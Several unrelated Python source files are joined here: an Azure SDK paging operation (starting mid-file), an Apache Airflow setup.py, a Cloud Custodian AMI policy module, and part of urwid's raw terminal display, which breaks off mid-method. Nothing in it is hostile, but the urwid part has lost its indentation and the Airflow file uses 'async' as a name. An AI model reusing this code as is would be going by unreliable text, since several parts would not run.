    deserialized = self._deserialize('DataSource', pipeline_response)

    if cls:
        return cls(pipeline_response, deserialized, {})
    return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourcegroups/{resourceGroupName}/providers/Microsoft.OperationalInsights/workspaces/{workspaceName}/dataSources/{dataSourceName}'}  # type: ignore
@distributed_trace
def list_by_workspace(
    self,
    resource_group_name: str,
    workspace_name: str,
    filter: str,
    skiptoken: Optional[str] = None,
    **kwargs: Any
) -> Iterable["_models.DataSourceListResult"]:
    """Gets the first page of data source instances in a workspace with the link to the next page.

    :param resource_group_name: The name of the resource group. The name is case insensitive.
    :type resource_group_name: str
    :param workspace_name: The name of the workspace.
    :type workspace_name: str
    :param filter: The filter to apply on the operation.
    :type filter: str
    :param skiptoken: Starting point of the collection of data source instances.
    :type skiptoken: str
    :keyword callable cls: A custom type or function that will be passed the direct response
    :return: An iterator like instance of either DataSourceListResult or the result of
     cls(response)
    :rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.loganalytics.models.DataSourceListResult]
    :raises: ~azure.core.exceptions.HttpResponseError
    """
    # NOTE(review): auto-generated Azure SDK paging operation; prefer
    # regenerating from the swagger over hand-editing.
    cls = kwargs.pop('cls', None)  # type: ClsType["_models.DataSourceListResult"]
    error_map = {
        401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
    }
    error_map.update(kwargs.pop('error_map', {}))

    def prepare_request(next_link=None):
        # First page: use the operation's URL template.  Subsequent pages:
        # re-issue the request against the service-provided next_link.
        if not next_link:
            request = build_list_by_workspace_request(
                resource_group_name=resource_group_name,
                workspace_name=workspace_name,
                subscription_id=self._config.subscription_id,
                filter=filter,
                skiptoken=skiptoken,
                template_url=self.list_by_workspace.metadata['url'],
            )
            request = _convert_request(request)
            request.url = self._client.format_url(request.url)
        else:
            request = build_list_by_workspace_request(
                resource_group_name=resource_group_name,
                workspace_name=workspace_name,
                subscription_id=self._config.subscription_id,
                filter=filter,
                skiptoken=skiptoken,
                template_url=next_link,
            )
            request = _convert_request(request)
            request.url = self._client.format_url(request.url)
            # next_link is a full URL; force method back to GET.
            request.method = "GET"
        return request

    def extract_data(pipeline_response):
        # Deserialize one page; return (link to next page or None, items).
        deserialized = self._deserialize("DataSourceListResult", pipeline_response)
        list_of_elem = deserialized.value
        if cls:
            list_of_elem = cls(list_of_elem)
        return deserialized.next_link or None, iter(list_of_elem)

    def get_next(next_link=None):
        # Fetch a single page, mapping HTTP errors to typed exceptions.
        request = prepare_request(next_link)

        pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
        response = pipeline_response.http_response

        if response.status_code not in [200]:
            map_error(status_code=response.status_code, response=response, error_map=error_map)
            raise HttpResponseError(response=response, error_format=ARMErrorFormat)

        return pipeline_response

    # ItemPaged drives get_next/extract_data lazily as the caller iterates.
    return ItemPaged(
        get_next, extract_data
    )

list_by_workspace.metadata = {'url': '/subscriptions/{subscriptionId}/resourcegroups/{resourceGroupName}/providers/Microsoft.OperationalInsights/workspaces/{workspaceName}/dataSources'}  # type: ignore
| |
# -*- coding: utf-8 -*-
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from setuptools import setup, find_packages, Command
from setuptools.command.test import test as TestCommand
import imp
import logging
import os
import pip
import sys
logger = logging.getLogger(__name__)

# Kept manually in sync with airflow.__version__
# NOTE(review): `imp` is deprecated on Python 3 in favour of importlib;
# presumably kept for Python 2.7 compatibility -- confirm before changing.
version = imp.load_source(
    'airflow.version', os.path.join('airflow', 'version.py')).version
class Tox(TestCommand):
    """``python setup.py test`` command that delegates to tox."""

    user_options = [('tox-args=', None, "Arguments to pass to tox")]

    def initialize_options(self):
        TestCommand.initialize_options(self)
        self.tox_args = ''

    def finalize_options(self):
        TestCommand.finalize_options(self)
        self.test_args = []
        self.test_suite = True

    def run_tests(self):
        # Import here, because outside of the command the eggs aren't loaded.
        import tox
        sys.exit(tox.cmdline(args=self.tox_args.split()))
class CleanCommand(Command):
    """Custom clean command to tidy up the project root."""

    user_options = []

    def initialize_options(self):
        """Nothing to set up."""
        pass

    def finalize_options(self):
        """Nothing to finalize."""
        pass

    def run(self):
        # Remove build artifacts from the project root.
        os.system('rm -vrf ./build ./dist ./*.pyc ./*.tgz ./*.egg-info')
def git_version(version):
    """
    Return a version suffix identifying the state of the underlying git repo.

    The returned string indicates whether the head of the current git-backed
    working directory is tied to a release tag ('.release:{version}+{sha}')
    or not ('.dev0+{sha}'), with a '.dirty' suffix appended when uncommitted
    changes are present.  Returns '' when gitpython or the repo is missing.

    :param version: the declared package version, asserted against the tag
    :return: version suffix string (possibly empty)
    """
    try:
        import git
    except ImportError:
        logger.warning('gitpython not found: Cannot compute the git version.')
        return ''
    try:
        repo = git.Repo('.git')
    except Exception as e:
        # Not a git checkout (e.g. building from an sdist); log the detail
        # instead of discarding it.
        logger.warning('Git repo not found: Cannot compute the git version. %s', e)
        return ''

    sha = repo.head.commit.hexsha
    if repo.is_dirty():
        return '.dev0+{sha}.dirty'.format(sha=sha)
    # Commit is clean -- is it an exact release of `version`?
    try:
        tag = repo.git.describe(
            match='[0-9]*', exact_match=True,
            tags=True, dirty=True)
        assert tag == version, (tag, version)
        return '.release:{version}+{sha}'.format(version=version, sha=sha)
    except git.GitCommandError:
        return '.dev0+{sha}'.format(sha=sha)
def write_version(filename=os.path.join(*['airflow',
                                          'git_version'])):
    """Write the computed git version string to *filename*."""
    content = "{}".format(git_version(version))
    with open(filename, 'w') as handle:
        handle.write(content)
# ---------------------------------------------------------------------------
# Optional dependency groups, exposed as extras via extras_require below.
# ---------------------------------------------------------------------------
# NOTE(review): `async` became a reserved keyword in Python 3.7; this module
# (and the matching extra name) would need renaming before supporting 3.7+.
async = [
    'greenlet>=0.4.9',
    'eventlet>= 0.9.7',
    'gevent>=0.13'
]
azure = ['azure-storage>=0.34.0']
sendgrid = ['sendgrid>=5.2.0']
celery = [
    'celery>=4.0.0',
    'flower>=0.7.3'
]
cgroups = [
    'cgroupspy>=0.1.4',
]
crypto = ['cryptography>=0.9.3']
dask = [
    'distributed>=1.15.2, <2'
]
databricks = ['requests>=2.5.1, <3']
datadog = ['datadog>=0.14.0']
doc = [
    'sphinx>=1.2.3',
    'sphinx-argparse>=0.1.13',
    'sphinx-rtd-theme>=0.1.6',
    'Sphinx-PyPI-upload>=0.2.1'
]
docker = ['docker-py>=1.6.0']
emr = ['boto3>=1.0.0']
gcp_api = [
    'httplib2',
    'google-api-python-client>=1.5.0, <1.6.0',
    'oauth2client>=2.0.2, <2.1.0',
    'PyOpenSSL',
    'google-cloud-dataflow',
    'pandas-gbq'
]
hdfs = ['snakebite>=2.7.8']
webhdfs = ['hdfs[dataframe,avro,kerberos]>=2.0.4']
jira = ['JIRA>1.0.7']
hive = [
    'hive-thrift-py>=0.0.1',
    'pyhive>=0.1.3',
    'impyla>=0.13.3',
    'unicodecsv>=0.14.1'
]
jdbc = ['jaydebeapi>=1.1.1']
mssql = ['pymssql>=2.1.1', 'unicodecsv>=0.14.1']
mysql = ['mysqlclient>=1.3.6']
rabbitmq = ['librabbitmq>=1.6.1']
oracle = ['cx_Oracle>=5.1.2']
postgres = ['psycopg2>=2.7.1']
ssh = ['paramiko>=2.1.1']
salesforce = ['simple-salesforce>=0.72']
s3 = ['boto3>=1.0.0']
samba = ['pysmbclient>=0.1.3']
slack = ['slackclient>=1.0.0']
statsd = ['statsd>=3.0.1, <4.0']
vertica = ['vertica-python>=0.5.1']
ldap = ['ldap3>=0.9.9.1']
kerberos = ['pykerberos>=1.1.13',
            'requests_kerberos>=0.10.0',
            'thrift_sasl>=0.2.0',
            'snakebite[kerberos]>=2.7.8',
            'kerberos>=1.2.5']
password = [
    'bcrypt>=2.0.0',
    'flask-bcrypt>=0.7.1',
]
github_enterprise = ['Flask-OAuthlib>=0.9.1']
qds = ['qds-sdk>=1.9.6']
cloudant = ['cloudant>=0.5.9,<2.0']  # major update coming soon, clamp to 0.x
redis = ['redis>=2.10.5']

# Aggregate groups built from the primitives above.
all_dbs = postgres + mysql + hive + mssql + hdfs + vertica + cloudant
devel = [
    'click',
    'freezegun',
    'jira',
    'lxml>=3.3.4',
    'mock',
    'moto==1.1.19',
    'nose',
    'nose-ignore-docstring==0.2',
    'nose-timer',
    'parameterized',
    'qds-sdk>=1.9.6',
    'rednose',
    'paramiko',
    'requests_mock'
]
devel_minreq = devel + mysql + doc + password + s3 + cgroups
devel_hadoop = devel_minreq + hive + hdfs + webhdfs + kerberos
devel_all = devel + all_dbs + doc + samba + s3 + slack + crypto + oracle + docker + ssh
def do_setup():
    """Write the git version file, then run the setuptools setup() call."""
    write_version()
    setup(
        name='apache-airflow',
        description='Programmatically author, schedule and monitor data pipelines',
        license='Apache License 2.0',
        version=version,
        packages=find_packages(exclude=['tests*']),
        package_data={'': ['airflow/alembic.ini', "airflow/git_version"]},
        include_package_data=True,
        zip_safe=False,
        scripts=['airflow/bin/airflow'],
        install_requires=[
            'alembic>=0.8.3, <0.9',
            'bleach==2.1.2',
            'configparser>=3.5.0, <3.6.0',
            'croniter>=0.3.17, <0.4',
            'dill>=0.2.2, <0.3',
            'flask>=0.11, <0.12',
            'flask-admin==1.4.1',
            'flask-cache>=0.13.1, <0.14',
            'flask-login==0.2.11',
            'flask-swagger==0.2.13',
            'flask-wtf==0.14',
            'funcsigs==1.0.0',
            'future>=0.16.0, <0.17',
            'gitpython>=2.0.2',
            'gunicorn>=19.4.0, <20.0',
            'iso8601>=0.1.12',
            'jinja2>=2.7.3, <2.9.0',
            'lxml>=3.6.0, <4.0',
            'markdown>=2.5.2, <3.0',
            'pandas>=0.17.1, <1.0.0',
            'pendulum==1.3.2',
            'psutil>=4.2.0, <5.0.0',
            'pygments>=2.0.1, <3.0',
            'python-daemon>=2.1.1, <2.2',
            'python-dateutil>=2.3, <3',
            'python-nvd3==0.14.2',
            'requests>=2.5.1, <3',
            'setproctitle>=1.1.8, <2',
            'sqlalchemy>=0.9.8',
            'sqlalchemy-utc>=0.9.0',
            'tabulate>=0.7.5, <0.8.0',
            'thrift>=0.9.2',
            'tzlocal>=1.4',
            'zope.deprecation>=4.0, <5.0',
        ],
        setup_requires=[
            'docutils>=0.14, <1.0',
        ],
        # Extras map onto the dependency-group lists defined at module level.
        extras_require={
            'all': devel_all,
            'all_dbs': all_dbs,
            'async': async,
            'azure': azure,
            'celery': celery,
            'cgroups': cgroups,
            'cloudant': cloudant,
            'crypto': crypto,
            'dask': dask,
            'databricks': databricks,
            'datadog': datadog,
            'devel': devel_minreq,
            'devel_hadoop': devel_hadoop,
            'doc': doc,
            'docker': docker,
            'emr': emr,
            'gcp_api': gcp_api,
            'github_enterprise': github_enterprise,
            'hdfs': hdfs,
            'hive': hive,
            'jdbc': jdbc,
            'kerberos': kerberos,
            'ldap': ldap,
            'mssql': mssql,
            'mysql': mysql,
            'oracle': oracle,
            'password': password,
            'postgres': postgres,
            'qds': qds,
            'rabbitmq': rabbitmq,
            's3': s3,
            'salesforce': salesforce,
            'samba': samba,
            'sendgrid': sendgrid,
            'slack': slack,
            'ssh': ssh,
            'statsd': statsd,
            'vertica': vertica,
            'webhdfs': webhdfs,
            'jira': jira,
            'redis': redis,
        },
        classifiers=[
            'Development Status :: 5 - Production/Stable',
            'Environment :: Console',
            'Environment :: Web Environment',
            'Intended Audience :: Developers',
            'Intended Audience :: System Administrators',
            'License :: OSI Approved :: Apache Software License',
            'Programming Language :: Python :: 2.7',
            'Programming Language :: Python :: 3.4',
            'Topic :: System :: Monitoring',
        ],
        author='Apache Software Foundation',
        author_email='dev@airflow.incubator.apache.org',
        url='http://airflow.incubator.apache.org/',
        download_url=(
            'https://dist.apache.org/repos/dist/release/incubator/airflow/' + version),
        # Custom commands: `python setup.py test` / `python setup.py extra_clean`
        cmdclass={
            'test': Tox,
            'extra_clean': CleanCommand,
        },
    )


if __name__ == "__main__":
    do_setup()
| |
# Copyright 2015-2019 Capital One Services, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import, division, print_function, unicode_literals
import itertools
import logging
from concurrent.futures import as_completed
import jmespath
from c7n.actions import BaseAction
from c7n.exceptions import ClientError
from c7n.filters import (
AgeFilter, Filter, CrossAccountAccessFilter)
from c7n.manager import resources
from c7n.query import QueryResourceManager, DescribeSource, TypeInfo
from c7n.resolver import ValuesFrom
from c7n.utils import local_session, type_schema, chunks
log = logging.getLogger('custodian.ami')
@resources.register('ami')
class AMI(QueryResourceManager):
    """EC2 machine image (AMI) resource manager."""

    class resource_type(TypeInfo):
        service = 'ec2'
        arn_type = 'image'
        enum_spec = ('describe_images', 'Images', None)
        id = 'ImageId'
        filter_name = 'ImageIds'
        filter_type = 'list'
        name = 'Name'
        date = 'CreationDate'

    def resources(self, query=None):
        """Enumerate images, defaulting the query to self-owned AMIs."""
        if not query:
            query = {}
        if query.get('Owners') is None:
            query['Owners'] = ['self']
        return super(AMI, self).resources(query=query)

    def get_source(self, source_type):
        """Use the AMI-aware describe source that prunes bad image ids."""
        if source_type != 'describe':
            return super(AMI, self).get_source(source_type)
        return DescribeImageSource(self)
class DescribeImageSource(DescribeSource):
    """Describe source that retries after pruning ids AWS rejects."""

    def get_resources(self, ids, cache=True):
        """Describe the given image ids, dropping not-found/malformed ids.

        `ids` is mutated in place so callers can observe which ids were
        pruned.  Returns [] when every id has been pruned.
        """
        while ids:
            try:
                return super(DescribeImageSource, self).get_resources(ids, cache)
            except ClientError as e:
                bad_ami_ids = ErrorHandler.extract_bad_ami(e)
                if bad_ami_ids:
                    # Guard each removal: previously a parsed id that was not
                    # in `ids` raised ValueError, and a retry that removed
                    # nothing looped forever on the same ClientError.
                    pruned = False
                    for b in bad_ami_ids:
                        if b in ids:
                            ids.remove(b)
                            pruned = True
                    if pruned:
                        continue
                raise
        return []
class ErrorHandler(object):
    """Parsers for client-side errors raised while describing images."""

    @staticmethod
    def extract_bad_ami(e):
        """Handle various client side errors when describing images.

        Returns the list of offending image ids parsed out of the error
        message, or None for unrecognized error codes.
        """
        msg = e.response['Error']['Message']
        code = e.response['Error']['Code']
        bad_ids = None
        if code == 'InvalidAMIID.NotFound':
            # Message embeds the ids as: ... '[ami-1, ami-2]' ...
            start = msg.find("'[") + 2
            end = msg.rfind("]'")
            bad_ids = [part.strip() for part in msg[start:end].split(',')]
            log.warning("Image not found %s" % bad_ids)
        elif code == 'InvalidAMIID.Malformed':
            # Message embeds the single id in double quotes.
            bad_ids = [msg[msg.find('"') + 1:msg.rfind('"')]]
            log.warning("Image id malformed %s" % bad_ids)
        return bad_ids
@AMI.action_registry.register('deregister')
class Deregister(BaseAction):
    """Action to deregister AMI

    To prevent deregistering all AMI, it is advised to use in conjunction with
    a filter (such as image-age)

    :example:

    .. code-block:: yaml

            policies:
              - name: ami-deregister-old
                resource: ami
                filters:
                  - type: image-age
                    days: 90
                actions:
                  - deregister
    """

    schema = type_schema('deregister', **{'delete-snapshots': {'type': 'boolean'}})
    # DeleteSnapshot is required for the optional delete-snapshots mode.
    permissions = ('ec2:DeregisterImage', 'ec2:DeleteSnapshot')
    snap_expr = jmespath.compile('BlockDeviceMappings[].Ebs.SnapshotId')

    def process(self, images):
        client = local_session(self.manager.session_factory).client('ec2')
        image_count = len(images)
        # Only the owning account can deregister an image.
        images = [i for i in images if self.manager.ctx.options.account_id == i['OwnerId']]
        if len(images) != image_count:
            self.log.info("Implicitly filtered %d non owned images", image_count - len(images))

        for i in images:
            self.manager.retry(client.deregister_image, ImageId=i['ImageId'])

            if not self.data.get('delete-snapshots'):
                continue
            snap_ids = self.snap_expr.search(i) or ()
            for s in snap_ids:
                try:
                    self.manager.retry(client.delete_snapshot, SnapshotId=s)
                except ClientError as e:
                    # BUG FIX: botocore ClientError exposes the code at
                    # e.response['Error']['Code']; `e.error` raised
                    # AttributeError.  Snapshots still in use are expected
                    # and skipped; anything else is re-raised instead of
                    # being silently swallowed.
                    if e.response['Error']['Code'] == 'InvalidSnapshot.InUse':
                        continue
                    raise
@AMI.action_registry.register('remove-launch-permissions')
class RemoveLaunchPermissions(BaseAction):
    """Action to remove the ability to launch an instance from an AMI

    This action will remove any launch permissions granted to other
    AWS accounts from the image, leaving only the owner capable of
    launching it

    :example:

    .. code-block:: yaml

            policies:
              - name: ami-stop-share-old
                resource: ami
                filters:
                  - type: image-age
                    days: 60
                actions:
                  - remove-launch-permissions
    """

    schema = type_schema('remove-launch-permissions')
    permissions = ('ec2:ResetImageAttribute',)

    def process(self, images):
        client = local_session(self.manager.session_factory).client('ec2')
        for image in images:
            self.process_image(client, image)

    def process_image(self, client, image):
        # Resetting launchPermission drops all cross-account grants.
        client.reset_image_attribute(
            ImageId=image['ImageId'], Attribute="launchPermission")
@AMI.action_registry.register('copy')
class Copy(BaseAction):
    """Action to copy AMIs with optional encryption

    This action can copy AMIs while optionally encrypting or decrypting
    the target AMI. It is advised to use in conjunction with a filter.

    Note there is a max in flight of 5 per account/region.

    :example:

    .. code-block:: yaml

            policies:
              - name: ami-ensure-encrypted
                resource: ami
                filters:
                  - type: value
                    key: encrypted
                    value: true
                actions:
                  - type: copy
                    encrypt: true
                    key-id: 00000000-0000-0000-0000-000000000000
    """

    permissions = ('ec2:CopyImage',)
    schema = {
        'type': 'object',
        'additionalProperties': False,
        'properties': {
            'type': {'enum': ['copy']},
            'name': {'type': 'string'},
            'description': {'type': 'string'},
            'region': {'type': 'string'},
            'encrypt': {'type': 'boolean'},
            'key-id': {'type': 'string'}
        }
    }

    def process(self, images):
        session = local_session(self.manager.session_factory)
        # Copy into the target region when one is configured, else in place.
        client = session.client(
            'ec2',
            region_name=self.data.get('region', None))

        for image in images:
            client.copy_image(
                Name=self.data.get('name', image['Name']),
                # BUG FIX: Description is optional on AMIs; the previous
                # image['Description'] default raised KeyError for images
                # without one (and was evaluated eagerly even when the
                # policy supplied its own description).
                Description=self.data.get(
                    'description', image.get('Description', '')),
                SourceRegion=session.region_name,
                SourceImageId=image['ImageId'],
                Encrypted=self.data.get('encrypt', False),
                KmsKeyId=self.data.get('key-id', ''))
@AMI.filter_registry.register('image-age')
class ImageAgeFilter(AgeFilter):
    """Filters images based on the age (in days)

    :example:

    .. code-block:: yaml

            policies:
              - name: ami-remove-launch-permissions
                resource: ami
                filters:
                  - type: image-age
                    days: 30
    """

    # AgeFilter compares against this resource attribute.
    date_attribute = "CreationDate"
    schema = type_schema(
        'image-age',
        op={'$ref': '#/definitions/filters_common/comparison_operators'},
        days={'type': 'number', 'minimum': 0})
@AMI.filter_registry.register('unused')
class ImageUnusedFilter(Filter):
    """Filters images based on usage

    true: image has no instances spawned from it
    false: image has instances spawned from it

    :example:

    .. code-block:: yaml

            policies:
              - name: ami-unused
                resource: ami
                filters:
                  - type: unused
                    value: true
    """

    schema = type_schema('unused', value={'type': 'boolean'})

    def get_permissions(self):
        # Union of the permissions needed to enumerate consumers of images.
        perms = []
        for rtype in ('asg', 'launch-config', 'ec2'):
            perms.extend(self.manager.get_resource_manager(rtype).get_permissions())
        return perms

    def _pull_asg_images(self):
        """Image ids referenced by ASG launch configs and launch templates."""
        asgs = self.manager.get_resource_manager('asg').resources()
        image_ids = set()
        lcfg_names = {a['LaunchConfigurationName'] for a in asgs
                      if 'LaunchConfigurationName' in a}

        lcfg_mgr = self.manager.get_resource_manager('launch-config')
        if lcfg_names:
            image_ids.update(
                cfg['ImageId'] for cfg in lcfg_mgr.resources()
                if cfg['LaunchConfigurationName'] in lcfg_names)

        tmpl_mgr = self.manager.get_resource_manager('launch-template-version')
        for tversion in tmpl_mgr.get_resources(
                list(tmpl_mgr.get_asg_templates(asgs).keys())):
            image_ids.add(tversion['LaunchTemplateData'].get('ImageId'))
        return image_ids

    def _pull_ec2_images(self):
        """Image ids referenced by running/launched EC2 instances."""
        ec2_manager = self.manager.get_resource_manager('ec2')
        return {i['ImageId'] for i in ec2_manager.resources()}

    def process(self, resources, event=None):
        used = self._pull_ec2_images() | self._pull_asg_images()
        if self.data.get('value', True):
            return [r for r in resources if r['ImageId'] not in used]
        return [r for r in resources if r['ImageId'] in used]
@AMI.filter_registry.register('cross-account')
class AmiCrossAccountFilter(CrossAccountAccessFilter):
    """Filter images granting launch permission to accounts outside the
    configured whitelist; violators are annotated with the extra grants."""

    schema = type_schema(
        'cross-account',
        # white list accounts
        whitelist_from=ValuesFrom.schema,
        whitelist={'type': 'array', 'items': {'type': 'string'}})

    permissions = ('ec2:DescribeImageAttribute',)

    def process_resource_set(self, client, accounts, resource_set):
        """Check one batch of images; return those with cross-account grants."""
        results = []
        for r in resource_set:
            attrs = self.manager.retry(
                client.describe_image_attribute,
                ImageId=r['ImageId'],
                Attribute='launchPermission')['LaunchPermissions']
            # Each grant is either a group (e.g. 'all') or a user account id.
            image_accounts = {a.get('Group') or a.get('UserId') for a in attrs}
            delta_accounts = image_accounts.difference(accounts)
            if delta_accounts:
                r['c7n:CrossAccountViolations'] = list(delta_accounts)
                results.append(r)
        return results

    def process(self, resources, event=None):
        """Fan the permission checks out over 20-image chunks, 2 workers."""
        results = []
        client = local_session(self.manager.session_factory).client('ec2')
        accounts = self.get_accounts()
        with self.executor_factory(max_workers=2) as w:
            futures = []
            for resource_set in chunks(resources, 20):
                futures.append(
                    w.submit(
                        self.process_resource_set, client, accounts, resource_set))
            for f in as_completed(futures):
                if f.exception():
                    # Log and continue: one failed chunk shouldn't abort the scan.
                    self.log.error(
                        "Exception checking cross account access \n %s" % (
                            f.exception()))
                    continue
                results.extend(f.result())
        return results
| |
#!/usr/bin/python
#
# Urwid raw display module
# Copyright (C) 2004-2009 Ian Ward
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
#
# Urwid web site: http://excess.org/urwid/
"""
Direct terminal UI implementation
"""
import os
import select
import struct
import sys
import signal
try:
import fcntl
import termios
import tty
except ImportError:
pass # windows
from urwid import util
from urwid import escape
from urwid.display_common import BaseScreen, RealTerminal, \
UPDATE_PALETTE_ENTRY, AttrSpec, UNPRINTABLE_TRANS_TABLE, \
INPUT_DESCRIPTORS_CHANGED
from urwid import signals
from urwid.compat import PYTHON3, bytes, B
from subprocess import Popen, PIPE
class Screen(BaseScreen, RealTerminal):
    def __init__(self, input=sys.stdin, output=sys.stdout):
        """Initialize a screen that directly prints escape codes to an output
        terminal.

        input -- file-like terminal input (NOTE: shadows the builtin `input`,
            kept for backwards compatibility)
        output -- file-like terminal output
        """
        super(Screen, self).__init__()
        self._pal_escape = {}     # palette name -> escape sequence
        self._pal_attrspec = {}   # palette name -> AttrSpec
        signals.connect_signal(self, UPDATE_PALETTE_ENTRY,
            self._on_update_palette_entry)
        self.colors = 16  # FIXME: detect this
        self.has_underline = True  # FIXME: detect this
        self.register_palette_entry(None, 'default', 'default')
        self._keyqueue = []
        self.prev_input_resize = 0   # resize-debounce state used by get_input
        self.set_input_timeouts()
        self.screen_buf = None       # last drawn canvas content, for diffing
        self._screen_buf_canvas = None
        self._resized = False        # set by the SIGWINCH handler
        self.maxrow = None
        self.gpm_mev = None          # gpm helper Popen object, when running
        self.gpm_event_pending = False
        self._mouse_tracking_enabled = False
        self.last_bstate = 0
        self._setup_G1_done = False
        self._rows_used = None
        self._cy = 0
        term = os.environ.get('TERM', '')
        # Terminal quirks inferred from $TERM.
        self.fg_bright_is_bold = not term.startswith("xterm")
        self.bg_bright_is_blink = (term == "linux")
        self.back_color_erase = not term.startswith("screen")
        self._next_timeout = None
        # Our connections to the world
        self._term_output_file = output
        self._term_input_file = input
        # pipe for signalling external event loops about resize events
        self._resize_pipe_rd, self._resize_pipe_wr = os.pipe()
        fcntl.fcntl(self._resize_pipe_rd, fcntl.F_SETFL, os.O_NONBLOCK)
def _on_update_palette_entry(self, name, *attrspecs):
    """Cache the attrspec and its escape sequence for a palette entry."""
    # Pick the attrspec matching our color depth.
    depth_index = {16: 0, 1: 1, 88: 2, 256: 3}[self.colors]
    spec = attrspecs[depth_index]
    self._pal_attrspec[name] = spec
    self._pal_escape[name] = self._attrspec_to_escape(spec)

def set_input_timeouts(self, max_wait=None, complete_wait=0.125,
        resize_wait=0.125):
    """
    Set the get_input timeout values.  All values are floating point
    numbers of seconds.

    max_wait -- seconds to wait for input when none is pending;
        wait forever if None
    complete_wait -- seconds to wait when get_input detects an
        incomplete escape sequence at the end of the available input
    resize_wait -- seconds to wait for more input after receiving two
        screen resize requests in a row, to stop Urwid from consuming
        100% cpu during a gradual window resize
    """
    self.max_wait = max_wait
    if max_wait is not None:
        if self._next_timeout is None:
            self._next_timeout = max_wait
        else:
            self._next_timeout = min(self._next_timeout, max_wait)
    self.complete_wait = complete_wait
    self.resize_wait = resize_wait
def _sigwinch_handler(self, signum, frame):
    """Handle SIGWINCH: flag the resize and wake any external event loop."""
    if not self._resized:
        # Signal the self-pipe only once per resize burst.
        os.write(self._resize_pipe_wr, B('R'))
    self._resized = True
    self.screen_buf = None

def _sigcont_handler(self, signum, frame):
    """Handle SIGCONT after a suspend: restart and force a full redraw."""
    self.stop()
    self.start()
    self._sigwinch_handler(None, None)

def signal_init(self):
    """
    Called in the startup of run wrapper to set the SIGWINCH
    and SIGCONT signal handlers.

    Override this function to call from main thread in threaded
    applications.
    """
    for signum, handler in (
            (signal.SIGWINCH, self._sigwinch_handler),
            (signal.SIGCONT, self._sigcont_handler)):
        signal.signal(signum, handler)

def signal_restore(self):
    """
    Called in the finally block of run wrapper to restore the
    SIGWINCH and SIGCONT signal handlers.

    Override this function to call from main thread in threaded
    applications.
    """
    for signum in (signal.SIGCONT, signal.SIGWINCH):
        signal.signal(signum, signal.SIG_DFL)
def set_mouse_tracking(self, enable=True):
    """
    Enable (or disable) mouse tracking.

    After calling this function get_input will include mouse
    click events along with keystrokes.
    """
    enable = bool(enable)
    if enable != self._mouse_tracking_enabled:
        self._mouse_tracking(enable)
        self._mouse_tracking_enabled = enable

def _mouse_tracking(self, enable):
    """Emit the terminal escapes and start/stop the gpm helper without
    touching the recorded desired state."""
    if enable:
        self.write(escape.MOUSE_TRACKING_ON)
        self._start_gpm_tracking()
    else:
        self.write(escape.MOUSE_TRACKING_OFF)
        self._stop_gpm_tracking()

def _start_gpm_tracking(self):
    """Spawn /usr/bin/mev to receive gpm mouse events (Linux console only)."""
    if not os.path.isfile("/usr/bin/mev"):
        return
    if not os.environ.get('TERM', "").lower().startswith("linux"):
        return
    if not Popen:
        return
    proc = Popen(["/usr/bin/mev", "-e", "158"], stdin=PIPE, stdout=PIPE,
        close_fds=True)
    # Non-blocking reads so pending events can be drained opportunistically.
    fcntl.fcntl(proc.stdout.fileno(), fcntl.F_SETFL, os.O_NONBLOCK)
    self.gpm_mev = proc

def _stop_gpm_tracking(self):
    """Interrupt and reap the gpm helper process, if one is running."""
    if not self.gpm_mev:
        return
    os.kill(self.gpm_mev.pid, signal.SIGINT)
    os.waitpid(self.gpm_mev.pid, 0)
    self.gpm_mev = None
def _start(self, alternate_buffer=True):
    """
    Initialize the screen and input mode.

    alternate_buffer -- use alternate screen buffer
    """
    if alternate_buffer:
        self.write(escape.SWITCH_TO_ALTERNATE_BUFFER)
        self._rows_used = None
    else:
        # Track rows used so the cursor can be parked below the drawn
        # area on exit (see _stop).
        self._rows_used = 0

    fd = self._term_input_file.fileno()
    if os.isatty(fd):
        # Save tty state for _stop to restore, then enter cbreak mode so
        # keys are delivered immediately without echo.
        self._old_termios_settings = termios.tcgetattr(fd)
        tty.setcbreak(fd)

    self.signal_init()
    self._alternate_buffer = alternate_buffer
    self._next_timeout = self.max_wait

    if not self._signal_keys_set:
        self._old_signal_keys = self.tty_signal_keys(fileno=fd)
    signals.emit_signal(self, INPUT_DESCRIPTORS_CHANGED)
    # restore mouse tracking to previous state
    self._mouse_tracking(self._mouse_tracking_enabled)

    return super(Screen, self)._start()
def _stop(self):
    """
    Restore the screen.
    """
    self.clear()

    signals.emit_signal(self, INPUT_DESCRIPTORS_CHANGED)

    self.signal_restore()

    fd = self._term_input_file.fileno()
    if os.isatty(fd):
        # Put the tty back the way _start found it.
        termios.tcsetattr(fd, termios.TCSADRAIN,
            self._old_termios_settings)

    self._mouse_tracking(False)

    # Leave the cursor somewhere sensible: back on the normal buffer, or
    # below the area we drew when not using the alternate buffer.
    move_cursor = ""
    if self._alternate_buffer:
        move_cursor = escape.RESTORE_NORMAL_BUFFER
    elif self.maxrow is not None:
        move_cursor = escape.set_cursor_position(
            0, self.maxrow)
    # Reset attributes, restore the G0 charset, then show the cursor.
    self.write(
        self._attrspec_to_escape(AttrSpec('', ''))
        + escape.SI
        + move_cursor
        + escape.SHOW_CURSOR)

    if self._old_signal_keys:
